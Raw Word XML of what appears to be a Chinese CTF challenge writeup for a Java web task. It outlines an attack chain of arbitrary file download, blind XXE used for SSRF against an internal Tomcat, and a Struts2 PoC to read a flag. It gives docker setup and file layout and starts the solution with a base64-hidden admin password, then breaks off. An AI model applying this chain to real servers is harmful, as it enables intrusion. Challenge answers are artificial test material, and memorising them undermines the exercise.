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E1A" w:rsidRPr="00EF6242" w:rsidRDefault="00C550B6" w:rsidP="00C550B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F6242">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>出题思路</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C550B6" w:rsidRDefault="00C550B6" w:rsidP="00C550B6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考察Java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00D5227B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关知识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C550B6" w:rsidRDefault="00A251A3" w:rsidP="009254DA">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大致</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="009254DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思路为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C550B6" w:rsidRPr="00C550B6" w:rsidRDefault="00C550B6" w:rsidP="009254DA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0B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任意文件下载</w:t>
      </w:r>
      <w:r w:rsidR="009254DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="009254DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置文件和</w:t>
      </w:r>
      <w:r w:rsidR="009254DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550B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C550B6" w:rsidRPr="00C550B6" w:rsidRDefault="00FC37E5" w:rsidP="009254DA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审计发现</w:t>
      </w:r>
      <w:r w:rsidR="00D74A48">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="00D74A48">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:r w:rsidR="00D74A48">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>blind XXE</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidR="001A1A8B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内网</w:t>
      </w:r>
      <w:r w:rsidR="001A1A8B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="005B633E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="001A1A8B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001A1A8B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C550B6" w:rsidRPr="00C550B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C550B6" w:rsidRPr="00C550B6" w:rsidRDefault="00C550B6" w:rsidP="009254DA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0B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Struts2 POC</w:t>
      </w:r>
      <w:r w:rsidR="00CF3030">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，读</w:t>
      </w:r>
      <w:r w:rsidR="00CF3030">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
      <w:r w:rsidR="007765D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C550B6" w:rsidRDefault="00C550B6" w:rsidP="00D02FB9"/>
    <w:p w:rsidR="00E534DB" w:rsidRDefault="00E534DB" w:rsidP="00D02FB9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题目环境启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E534DB" w:rsidRPr="00020C78" w:rsidRDefault="008F6C1D" w:rsidP="00BE146F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建容器并</w:t>
      </w:r>
      <w:r w:rsidR="00E534DB" w:rsidRPr="00020C78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidR="00E534DB" w:rsidRPr="00020C78">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E534DB" w:rsidRPr="00020C78" w:rsidRDefault="00E534DB" w:rsidP="00020C78">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C23EC5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo docker-compose up –d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E534DB" w:rsidRPr="00020C78" w:rsidRDefault="005F54D4" w:rsidP="00BE146F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于数据库需要初始化数据，请执行</w:t>
      </w:r>
      <w:r w:rsidR="00E534DB" w:rsidRPr="00020C78">
        <w:t>restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次启动容器</w:t>
      </w:r>
      <w:r w:rsidR="00E534DB" w:rsidRPr="00020C78">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E534DB" w:rsidRPr="00C23EC5" w:rsidRDefault="00E534DB" w:rsidP="00E534DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23EC5">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo docker-compose restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068493B" w:rsidRDefault="0033386E" w:rsidP="00E8403B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若</w:t>
      </w:r>
      <w:r w:rsidR="00D55AF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺利</w:t>
      </w:r>
      <w:r w:rsidR="00F06E3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8883</w:t>
      </w:r>
      <w:r w:rsidR="00D55AF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00A12296">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即成功：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB16BB" w:rsidRDefault="000927D1" w:rsidP="00E8403B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17063DCD" wp14:editId="4720777B">
            <wp:extent cx="5274310" cy="3035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94" w:rsidRPr="00D16391" w:rsidRDefault="00933294" w:rsidP="00E8403B"/>
    <w:p w:rsidR="00D02FB9" w:rsidRPr="001E4AA3" w:rsidRDefault="00D02FB9" w:rsidP="00D02FB9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F6242">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件夹结构及其主要作用描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  writeup.docx</w:t>
      </w:r>
      <w:r w:rsidR="00770160">
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidR="00245156">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目的writeup文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>└─</w:t>
      </w:r>
      <w:r>
        <w:t>docker_ddctf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  docker-compose.yml</w:t>
      </w:r>
      <w:r w:rsidR="00E81985">
        <w:t xml:space="preserve">  //docke</w:t>
      </w:r>
      <w:r w:rsidR="00E81985">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r环境启动的配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    ├─db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  ├─backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRPr="00D81E8C" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  │      ddctf2018_web_xxe.sql</w:t>
      </w:r>
      <w:r w:rsidR="00D81E8C">
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="001B37BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="001B37BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B37BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web需要的数据</w:t>
      </w:r>
      <w:r w:rsidR="002C2740">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库数据</w:t>
      </w:r>
      <w:r w:rsidR="00B300C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  │      my-entrypoint.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  │      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    │  └─data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    ├─web</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  ├─flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  │      hint.txt</w:t>
      </w:r>
      <w:r w:rsidR="00900B58">
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="007A0119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>进入内网第二</w:t>
      </w:r>
      <w:r w:rsidR="00900B58" w:rsidRPr="007A0119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关的提示文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  │      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  ├─logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │  └─webapps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │      └─ROOT</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="007A0119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="007A0119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（SpringMVC</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:t>+Mybatis+Spring</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    │                      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">    └─web2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        ├─flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │  │  blocksystem.txt</w:t>
      </w:r>
      <w:r w:rsidR="00DF7CDE">
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="00912135">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止用户命令执行后，输出的文字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │  │  docker-entrypoint.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │  │  flag.txt</w:t>
      </w:r>
      <w:r w:rsidR="002E187B">
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="003667DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>存</w:t>
      </w:r>
      <w:r w:rsidR="003667DC" w:rsidRPr="003667DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidR="003667DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="002E187B" w:rsidRPr="003667DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="008621A8" w:rsidRPr="003667DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │  │  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │  └─sandbox</w:t>
      </w:r>
      <w:r w:rsidR="00992520">
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="00992520" w:rsidRPr="00250BC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>阻止命令执行的</w:t>
      </w:r>
      <w:r w:rsidR="00992520" w:rsidRPr="00250BC4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”jvm-sandbox”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        │              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">        └─webapps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006822D9" w:rsidRDefault="006822D9" w:rsidP="006822D9">
      <w:r>
        <w:t xml:space="preserve">            └─ROOT</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:t xml:space="preserve">  //Web2</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用程序（Struts</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00786512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00500858" w:rsidRDefault="00500858" w:rsidP="001E4AA3"/>
    <w:p w:rsidR="007B0AC5" w:rsidRDefault="007B0AC5" w:rsidP="001E4AA3"/>
    <w:p w:rsidR="00C550B6" w:rsidRPr="00EF6242" w:rsidRDefault="00C550B6" w:rsidP="00C550B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F6242">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>预期解题过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00500858" w:rsidRDefault="00500858" w:rsidP="001C7BB9"/>
    <w:p w:rsidR="001C7BB9" w:rsidRDefault="001C7BB9" w:rsidP="001C7BB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE40F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>任意文件下载漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694660" w:rsidRDefault="00694660" w:rsidP="00694660">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问主页面，查看源码发现有base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码文字:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694660" w:rsidRPr="00EB04E1" w:rsidRDefault="002C06F0" w:rsidP="00694660">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002C06F0">
        <w:t>YWRtaW46IGFkbWluX3Bhc3N3b3JkXzIzMzNfY2FpY2Fpa2Fu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694660" w:rsidRDefault="00694660" w:rsidP="00694660">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码为:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694660" w:rsidRDefault="00EB04E1" w:rsidP="00C550B6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB04E1">
        <w:t>admin: admin_password_2333_caicaikan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694660" w:rsidRDefault="002E53F8" w:rsidP="00C550B6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用上述用户名和密码</w:t>
      </w:r>
      <w:r w:rsidR="001C7BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001C7BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="00E45CCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有文件下载</w:t>
      </w:r>
      <w:r w:rsidR="00525B4F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
